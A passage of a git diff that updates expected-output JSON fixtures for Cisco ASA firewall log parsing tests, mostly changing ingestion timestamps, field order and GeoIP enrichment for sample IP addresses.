@@ -4612,40 +4585,12 @@ }, "assigned_ip": "192.168.50.5" } - } - }, - { - "log": { - "level": "informational" - }, - "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "Oxfordshire", - "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" - } - }, - "address": "81.2.69.144", - "user": { - "name": "testuser" - }, - "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "dev01", "product": "asa", @@ -4667,13 +4612,35 @@ "81.2.69.144" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "dev01" }, + "source": { + "geo": { + "continent_name": "Europe", + "region_iso_code": "GB-ENG", + "city_name": "London", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "England", + "location": { + "lon": -0.0931, + "lat": 51.5142 + } + }, + "address": "81.2.69.144", + "user": { + "name": "testuser" + }, + "ip": "81.2.69.144" + }, "event": { "severity": 6, "reason": "User Requested", - "ingested": "2021-12-09T13:33:30.615664600Z", + "ingested": "2021-12-14T14:38:14.656581938Z", "original": "Apr 27 02:03:03 dev01: %ASA-6-716002: Group another-policy User testuser IP 81.2.69.144 WebVPN session terminated: User Requested.", "code": "716002", "kind": "event", @@ -4691,22 +4658,12 @@ "group_name": "another-policy" } } - } - }, - { - "log": { - "level": "informational" - }, - "source": { - "user": { - "name": "alice" - }, - "address": "192.168.50.1", - "ip": "192.168.50.1" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "dev01", "product": "asa", 
@@ -4728,13 +4685,23 @@ "192.168.50.1" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "dev01" }, + "source": { + "user": { + "name": "alice" + }, + "address": "192.168.50.1", + "ip": "192.168.50.1" + }, "event": { "severity": 6, "reason": "Idle timeout", - "ingested": "2021-12-09T13:33:30.615673800Z", + "ingested": "2021-12-14T14:38:14.656582310Z", "original": "Apr 27 02:03:03 dev01: %ASA-6-716002: Group another-policy User alice IP 192.168.50.1 WebVPN session terminated: Idle timeout.", "code": "716002", "kind": "event", @@ -4752,7 +4719,10 @@ "group_name": "another-policy" } } - } + }, + "tags": [ + "preserve_original_event" + ] }, { "log": { @@ -4766,20 +4736,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -4822,7 +4786,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:33:30.615895700Z", + "ingested": "2021-12-14T14:38:14.656582675Z", "original": "Apr 27 02:03:03 dev01: %ASA-3-710003: TCP access denied by ACL from 81.2.69.144/6370 to outside:192.168.157.61/23", "code": "710003", "kind": "event", 
@@ -4854,20 +4818,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -4914,7 +4872,7 @@ }, "event": { "severity": 5, - "ingested": "2021-12-09T13:33:30.615901200Z", + "ingested": "2021-12-14T14:38:14.656583103Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-5-434004: SFR requested ASA to bypass further packet redirection and process TCP flow from sourceInterfaceName:81.2.69.144/8888 to destinationInterfaceName:192.168.2.2/123123 locally", "code": "434004", "kind": "event", @@ -4947,20 +4905,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -5008,7 +4960,7 @@ "event": { "severity": 4, "action": "drop", - "ingested": "2021-12-09T13:33:30.615907100Z", + "ingested": "2021-12-14T14:38:14.656583461Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-4-434002: SFR requested to drop TCP packet from sourceInterfaceName:81.2.69.144/8888 to destinationInterfaceName:192.168.2.2/514514", "code": "434002", "outcome": "unknown" 
@@ -5032,20 +4984,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -5088,7 +5034,7 @@ "event": { "severity": 6, "reason": "Failed to locate egress interface", - "ingested": "2021-12-09T13:33:30.615911800Z", + "ingested": "2021-12-14T14:38:14.656583831Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-110002: Failed to locate egress interface for TCP from sourceInterfaceName:81.2.69.144/7777 to 192.168.2.2/123412", "code": "110002", "kind": "event", @@ -5120,20 +5066,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -5181,7 +5121,7 @@ "event": { "severity": 4, "reason": "Duplicate TCP SYN with different initial sequence number", - "ingested": "2021-12-09T13:33:30.615916600Z", + "ingested": "2021-12-14T14:38:14.656584183Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-4-419002: Duplicate TCP SYN from sourceInterfaceName:81.2.69.144/7777 to destinationInterfaceName:192.168.2.2/514514 with different initial sequence number", "code": "419002", "kind": "event", 
@@ -5211,20 +5151,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -5266,7 +5200,7 @@ "event": { "severity": 6, "action": "created", - "ingested": "2021-12-09T13:33:30.615926700Z", + "ingested": "2021-12-14T14:38:14.656584655Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-602303: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 81.2.69.144 and 192.168.2.2 (user= admin) has been created.", "code": "602303", "outcome": "success" @@ -5289,20 +5223,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -5343,7 +5271,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.616188100Z", + "ingested": "2021-12-14T14:38:14.656585157Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-602304: IPSEC: An outbound LAN-to-LAN SA (SPI= 0xF81283) between 81.2.69.144 and 192.168.2.2 (user= admin) has been deleted.", "code": "602304", "kind": "event", 
@@ -5378,20 +5306,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -5429,7 +5351,7 @@ "event": { "severity": 5, "reason": "Received a IKE_INIT_SA request", - "ingested": "2021-12-09T13:33:30.616193300Z", + "ingested": "2021-12-14T14:38:14.656585505Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-5-750002: Local:81.2.69.144:7777 Remote:192.168.2.2:7777 Username:admin Received a IKE_INIT_SA request", "code": "750002", "kind": "event", @@ -5461,20 +5383,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", @@ -5512,7 +5428,7 @@ "event": { "severity": 4, "reason": "Negotiation aborted due to Failed to locate an item in the database", - "ingested": "2021-12-09T13:33:30.616198400Z", + "ingested": "2021-12-14T14:38:14.656585865Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-4-750003: Local:81.2.69.144:7777 Remote:192.168.2.2:7777 Username:admin Negotiation aborted due to ERROR: Failed to locate an item in the database", "code": "750003", "kind": "event", 
@@ -5532,16 +5448,6 @@ } }, { - "log": { - "level": "notification" - }, - "source": { - "address": "192.168.1.1", - "ip": "192.168.1.1" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "dev01", "product": "asa", @@ -5560,13 +5466,20 @@ "192.168.1.1" ] }, + "log": { + "level": "notification" + }, "host": { "hostname": "dev01" }, + "source": { + "address": "192.168.1.1", + "ip": "192.168.1.1" + }, "event": { "severity": 5, "reason": "PHASE 2 COMPLETED", - "ingested": "2021-12-09T13:33:30.616203400Z", + "ingested": "2021-12-14T14:38:14.656586223Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-5-713120: Group = 100.60.140.10, IP = 192.168.1.1, PHASE 2 COMPLETED (msgid=bbe383e88)", "code": "713120", "kind": "event", @@ -5583,19 +5496,12 @@ }, "cisco": { "asa": {} - } - }, - { - "log": { - "level": "notification" - }, - "source": { - "address": "192.168.157.61", - "ip": "192.168.157.61" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "dev01", "product": "asa", @@ -5614,13 +5520,20 @@ "192.168.157.61" ] }, + "log": { + "level": "notification" + }, "host": { "hostname": "dev01" }, + "source": { + "address": "192.168.157.61", + "ip": "192.168.157.61" + }, "event": { "severity": 5, "reason": "Duplicate first packet detected", - "ingested": "2021-12-09T13:33:30.616208500Z", + "ingested": "2021-12-14T14:38:14.656586654Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-5-713202: IP = 192.168.157.61, Duplicate first packet detected. Ignoring packet.", "code": "713202", "kind": "event", @@ -5634,19 +5547,12 @@ }, "cisco": { "asa": {} - } - }, - { - "log": { - "level": "informational" - }, - "source": { - "address": "192.168.1.1", - "ip": "192.168.1.1" }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "hostname": "dev01", "product": "asa", 
@@ -5665,13 +5571,20 @@ "192.168.1.1" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "dev01" }, + "source": { + "address": "192.168.1.1", + "ip": "192.168.1.1" + }, "event": { "severity": 6, "reason": "All IPSec SA proposals found unacceptable!", - "ingested": "2021-12-09T13:33:30.616213100Z", + "ingested": "2021-12-14T14:38:14.656587013Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713905: Group = 100.60.140.10, IP = 192.168.1.1, All IPSec SA proposals found unacceptable!", "code": "713905", "kind": "event", @@ -5687,7 +5600,10 @@ }, "cisco": { "asa": {} - } + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { @@ -5714,7 +5630,7 @@ "event": { "severity": 6, "reason": "All IPSec SA proposals found unacceptable!", - "ingested": "2021-12-09T13:33:30.616217500Z", + "ingested": "2021-12-14T14:38:14.656587373Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713904: All IPSec SA proposals found unacceptable!", "code": "713904", "kind": "event", @@ -5759,7 +5675,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:30.616222200Z", + "ingested": "2021-12-14T14:38:14.656587728Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713903: IP = 192.168.1.1, All IPSec SA proposals found unacceptable!", "code": "713903", "kind": "event", @@ -5803,7 +5719,7 @@ "event": { "severity": 6, "reason": "All IPSec SA proposals found unacceptable!", - "ingested": "2021-12-09T13:33:30.616226700Z", + "ingested": "2021-12-14T14:38:14.656588091Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713902: Group = 100.60.140.10, All IPSec SA proposals found unacceptable!", "code": "713902", "kind": "event", @@ -5825,16 +5741,6 @@ ] }, { - "log": { - "level": "informational" - }, - "source": { - "address": "192.168.1.1", - "ip": "192.168.1.1" - }, - "tags": [ - "preserve_original_event" - ], "observer": { "hostname": "dev01", "product": "asa", 
@@ -5853,13 +5759,20 @@ "192.168.1.1" ] }, + "log": { + "level": "informational" + }, "host": { "hostname": "dev01" }, + "source": { + "address": "192.168.1.1", + "ip": "192.168.1.1" + }, "event": { "severity": 6, "reason": "All IPSec SA proposals found unacceptable!", - "ingested": "2021-12-09T13:33:30.616230700Z", + "ingested": "2021-12-14T14:38:14.656588533Z", "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-713901: Group = 100.60.140.10, IP = 192.168.1.1, All IPSec SA proposals found unacceptable!", "code": "713901", "kind": "event", @@ -5875,7 +5788,10 @@ }, "cisco": { "asa": {} - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json index bf923419738..159efdad24f 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-fix.log-expected.json @@ -57,7 +57,7 @@ "event": { "severity": 6, "duration": 0, - "ingested": "2021-12-09T13:33:40.267545800Z", + "ingested": "2021-12-14T14:38:24.088153880Z", "original": "Apr 17 2020 14:08:08 SNL-ASA-VPN-A01 : %ASA-6-302016: Teardown UDP connection 110577675 for Outside:10.123.123.123/53723(LOCAL\\Elastic) to Inside:10.233.123.123/53 duration 0:00:00 bytes 148 (zzzzzz)", "code": "302016", "kind": "event", @@ -134,7 +134,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:40.267555200Z", + "ingested": "2021-12-14T14:38:24.088156744Z", "original": "Apr 17 2020 14:00:31 SNL-ASA-VPN-A01 : %ASA-4-106023: Deny icmp src Inside:10.123.123.123 dst Outside:10.123.123.123 (type 11, code 0) by access-group \"Inside_access_in\" [0x0, 0x0]", "code": "106023", "kind": "event", 
@@ -203,7 +203,7 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-12-09T13:33:40.267561100Z",
+ "ingested": "2021-12-14T14:38:24.088157221Z",
 "original": "Apr 15 2013 09:36:50: %ASA-4-106023: Deny tcp src dmz:10.123.123.123/6316 dst outside:10.123.123.123/53 type 3, code 0, by access-group \"acl_dmz\" [0xe3afb522, 0x0]",
 "code": "106023",
 "kind": "event",
@@ -279,7 +279,7 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-12-09T13:33:40.267566800Z",
+ "ingested": "2021-12-14T14:38:24.088157636Z",
 "original": "Apr 17 2020 14:16:20 SNL-ASA-VPN-A01 : %ASA-4-106023: Deny udp src Inside:10.123.123.123/57621(LOCAL\\Elastic) dst Outside:10.123.123.123/57621 by access-group \"Inside_access_in\" [0x0, 0x0]",
 "code": "106023",
 "kind": "event",
@@ -340,7 +340,7 @@
 },
 "event": {
 "severity": 2,
- "ingested": "2021-12-09T13:33:40.267572500Z",
+ "ingested": "2021-12-14T14:38:24.088158021Z",
 "original": "Apr 17 2020 14:15:07 SNL-ASA-VPN-A01 : %ASA-2-106017: Deny IP due to Land Attack from 10.123.123.123 to 10.123.123.123",
 "code": "106017",
 "kind": "event",
@@ -401,7 +401,7 @@
 },
 "event": {
 "severity": 3,
- "ingested": "2021-12-09T13:33:40.267578400Z",
+ "ingested": "2021-12-14T14:38:24.088158406Z",
 "original": "Apr 17 2020 14:15:07 SNL-ASA-VPN-A01 : %ASA-3-313008: Denied IPv6-ICMP type=134, code=0 from fe80::1ff:fe23:4567:890a on interface ISP1",
 "code": "313008",
 "kind": "event",
@@ -471,7 +471,7 @@
 },
 "event": {
 "severity": 4,
- "ingested": "2021-12-09T13:33:40.267584100Z",
+ "ingested": "2021-12-14T14:38:24.088158903Z",
 "original": "Jun 08 2020 12:59:57: %ASA-4-313009: Denied invalid ICMP code 9, for Inside:10.255.0.206/8795 (10.255.0.206/8795) to identity:10.12.31.51/0 (10.12.31.51/0), ICMP id 295, ICMP type 8",
 "code": "313009",
 "kind": "event",
@@ -545,7 +545,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:40.267589800Z", + "ingested": "2021-12-14T14:38:24.088159295Z", "original": "Oct 20 2019 15:42:53: %ASA-6-106100: access-list incoming permitted udp dmz2/127.2.3.4(56575) -\u003e inside/127.3.4.5(53) hit-cnt 1 first hit [0x93d0e533, 0x578ef52f]", "code": "106100", "kind": "event", @@ -615,7 +615,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:40.267609700Z", + "ingested": "2021-12-14T14:38:24.088159685Z", "original": "Oct 20 2019 15:42:54: %ASA-6-106100: access-list incoming permitted udp dmz2/127.2.3.4(56575)(LOCAL\\\\username) -\u003e inside/127.3.4.5(53) hit-cnt 1 first hit [0x93d0e533, 0x578ef52f]", "code": "106100", "kind": "event", @@ -688,7 +688,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:33:40.267615100Z", + "ingested": "2021-12-14T14:38:24.088160069Z", "original": "Aug 6 2020 11:01:37: %ASA-session-3-106102: access-list dev_inward_client permitted udp for user redacted outside/10.123.123.20(49721) -\u003e inside/10.223.223.40(53) hit-cnt 1 first hit [0x3c8b88c1, 0xbee595c3]", "code": "106102", "kind": "event", @@ -721,20 +721,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", 
@@ -783,7 +777,7 @@
 },
 "event": {
 "severity": 1,
- "ingested": "2021-12-09T13:33:40.267620400Z",
+ "ingested": "2021-12-14T14:38:24.088160455Z",
 "original": "Aug 6 2020 11:01:38: %ASA-1-106103: access-list filter denied icmp for user joe inside/10.1.2.3(64321) -\u003e outside/81.2.69.144(8080) hit-cnt 1 first hit [0x3c8b88c1, 0xbee595c3]",
 "code": "106103",
 "kind": "event",
diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-missing-groups.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-missing-groups.log-expected.json
index d976934cd30..6f73a88fa5c 100644
--- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-missing-groups.log-expected.json
+++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa-missing-groups.log-expected.json
@@ -1,26 +1,6 @@
 {
 "expected": [
 {
- "log": {
- "level": "warning"
- },
- "destination": {
- "bytes": 0,
- "address": "67.43.156.12",
- "ip": "67.43.156.12"
- },
- "source": {
- "user": {
- "name": "Ringo",
- "group": {
- "name": "TheBeatles"
- }
- },
- "bytes": 32452
- },
- "tags": [
- "preserve_original_event"
- ],
 "observer": {
 "type": "firewall",
 "product": "asa",
@@ -38,11 +18,40 @@ "67.43.156.12" ] }, + "log": { + "level": "warning" + }, + "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.12", + "bytes": 0, + "ip": "67.43.156.12" + }, + "source": { + "user": { + "name": "Ringo", + "group": { + "name": "TheBeatles" + } + }, + "bytes": 32452 + }, "event": { "severity": 4, "duration": 112000000000, "reason": "User Requested", - "ingested": "2021-12-09T13:33:41.556907800Z", + "ingested": "2021-12-14T14:38:25.437811581Z", "original": "Jun 08 2020 12:59:57: %ASA-4-113019: Group = TheBeatles, Username = Ringo, IP = 67.43.156.12, Session disconnected. Session Type: AnyConnect-Parent, Duration: 0h:01m:52s, Bytes xmt: 32452, Bytes rcv: 0, Reason: User Requested", "code": "113019", "kind": "event", @@ -60,29 +69,12 @@ "asa": { "session_type": "AnyConnect-Parent" } - } - }, - { - "log": { - "level": "warning" - }, - "destination": { - "bytes": 43252324, - "address": "67.43.156.12", - "ip": "67.43.156.12" - }, - "source": { - "user": { - "name": "John", - "group": { - "name": "TheBeatles" - } - }, - "bytes": 45323434 }, "tags": [ "preserve_original_event" - ], + ] + }, + { "observer": { "type": "firewall", "product": "asa", 
@@ -100,11 +92,40 @@ "67.43.156.12" ] }, + "log": { + "level": "warning" + }, + "destination": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.12", + "bytes": 43252324, + "ip": "67.43.156.12" + }, + "source": { + "user": { + "name": "John", + "group": { + "name": "TheBeatles" + } + }, + "bytes": 45323434 + }, "event": { "severity": 4, "duration": 8854000000000, "reason": "Idle Timeout", - "ingested": "2021-12-09T13:33:41.556916700Z", + "ingested": "2021-12-14T14:38:25.437814109Z", "original": "Oct 20 2019 15:42:53: %ASA-4-113019: Group = TheBeatles, Username = John, IP = 67.43.156.12, Session disconnected. Session Type: SSL, Duration: 2h:27m:34s, Bytes xmt: 45323434, Bytes rcv: 43252324, Reason: Idle Timeout", "code": "113019", "kind": "event", @@ -122,7 +143,10 @@ "asa": { "session_type": "SSL" } - } + }, + "tags": [ + "preserve_original_event" + ] }, { "observer": { @@ -139,7 +163,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.556922600Z", + "ingested": "2021-12-14T14:38:25.437814588Z", "original": "Oct 20 2019 15:42:54: %ASA-4-722037: Group \u003cGroupPolicy_TheBeatles\u003e User \u003cPaul\u003e IP \u003c83.212.241.149\u003e SVC closing connection: DPD failure.", "code": "722037", "kind": "event", @@ -173,7 +197,7 @@ }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.556928400Z", + "ingested": "2021-12-14T14:38:25.437814959Z", "original": "Aug 6 2020 11:01:37: %ASA-4-722037: Group \u003cGroupPolicy_TheBeatles\u003e User \u003cBrian\u003e IP \u003c234.63.56.32\u003e SVC closing connection: Transport closing.", "code": "722037", "kind": "event", 
@@ -214,15 +238,27 @@ "level": "warning" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, + "address": "67.43.156.12", "user": { "name": "George" }, - "address": "67.43.156.12", "ip": "67.43.156.12" }, "event": { "severity": 4, - "ingested": "2021-12-09T13:33:41.556934300Z", + "ingested": "2021-12-14T14:38:25.437815314Z", "original": "Aug 6 2020 11:01:38: %ASA-4-722051: Group \u003cGroupPolicy_TheBeatles\u003e User \u003cGeorge\u003e IP \u003c67.43.156.12\u003e IPv4 Address \u003c67.43.156.12\u003e IPv6 address \u003c::\u003e assigned to session", "code": "722051", "kind": "event", diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json index 749298a2f82..31fcf237859 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-asa.log-expected.json @@ -59,7 +59,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.994733500Z", + "ingested": "2021-12-14T14:38:25.938755022Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:192.168.98.44/8256", "code": "305011", "kind": "event", @@ -138,7 +138,7 @@ }, "event": { "severity": 6, - "ingested": "2021-12-09T13:33:41.994738Z", + "ingested": "2021-12-14T14:38:25.938759326Z", "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11757 for outside:192.168.205.104/80 (192.168.205.104/80) to inside:172.31.98.44/1772 (172.31.98.44/1772)", "code": "302013", "kind": "event", 
@@ -224,7 +224,7 @@
 "severity": 6,
 "duration": 67000000000,
 "reason": "TCP Reset-I",
- "ingested": "2021-12-09T13:33:41.994741800Z",
+ "ingested": "2021-12-14T14:38:25.938760309Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11749 for outside:192.168.211.242/80 to inside:172.31.98.44/1758 duration 0:01:07 bytes 38110 TCP Reset-I",
 "code": "302014",
 "kind": "event",
@@ -309,7 +309,7 @@
 "severity": 6,
 "duration": 67000000000,
 "reason": "TCP Reset-I",
- "ingested": "2021-12-09T13:33:41.994748300Z",
+ "ingested": "2021-12-14T14:38:25.938761029Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11748 for outside:192.168.211.242/80 to inside:172.31.98.44/1757 duration 0:01:07 bytes 44010 TCP Reset-I",
 "code": "302014",
 "kind": "event",
@@ -394,7 +394,7 @@
 "severity": 6,
 "duration": 67000000000,
 "reason": "TCP Reset-I",
- "ingested": "2021-12-09T13:33:41.994753400Z",
+ "ingested": "2021-12-14T14:38:25.938761769Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11745 for outside:192.168.185.90/80 to inside:172.31.98.44/1755 duration 0:01:07 bytes 7652 TCP Reset-I",
 "code": "302014",
 "kind": "event",
@@ -479,7 +479,7 @@
 "severity": 6,
 "duration": 67000000000,
 "reason": "TCP Reset-I",
- "ingested": "2021-12-09T13:33:41.994758800Z",
+ "ingested": "2021-12-14T14:38:25.938762461Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11744 for outside:192.168.185.90/80 to inside:172.31.98.44/1754 duration 0:01:07 bytes 7062 TCP Reset-I",
 "code": "302014",
 "kind": "event",
@@ -564,7 +564,7 @@
 "severity": 6,
 "duration": 68000000000,
 "reason": "TCP Reset-I",
- "ingested": "2021-12-09T13:33:41.994765Z",
+ "ingested": "2021-12-14T14:38:25.938763078Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11742 for outside:192.168.160.197/80 to inside:172.31.98.44/1752 duration 0:01:08 bytes 5738 TCP Reset-I",
 "code": "302014",
 "kind": "event",
@@ -649,7 +649,7 @@
 "severity": 6,
 "duration": 68000000000,
 "reason": "TCP Reset-I",
- "ingested": "2021-12-09T13:33:41.994771300Z",
+ "ingested": "2021-12-14T14:38:25.938763682Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11738 for outside:192.168.205.14/80 to inside:172.31.98.44/1749 duration 0:01:08 bytes 4176 TCP Reset-I",
 "code": "302014",
 "kind": "event",
@@ -734,7 +734,7 @@
 "severity": 6,
 "duration": 68000000000,
 "reason": "TCP Reset-I",
- "ingested": "2021-12-09T13:33:41.994779800Z",
+ "ingested": "2021-12-14T14:38:25.938764426Z",
 "original": "Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11739 for outside:192.168.124.33/80 to inside:172.31.98.44/1750 duration 0:01:08 bytes 1715 TCP Reset-I",
 "code": "302014",
 "kind": "event",
@@ -819,7 +819,7 @@
 "severity": 6,
 "duration": 69000000000,
 "reason": "TCP Reset-I",
- "ingested": "2021-12-09T13:33:41.994786200Z",
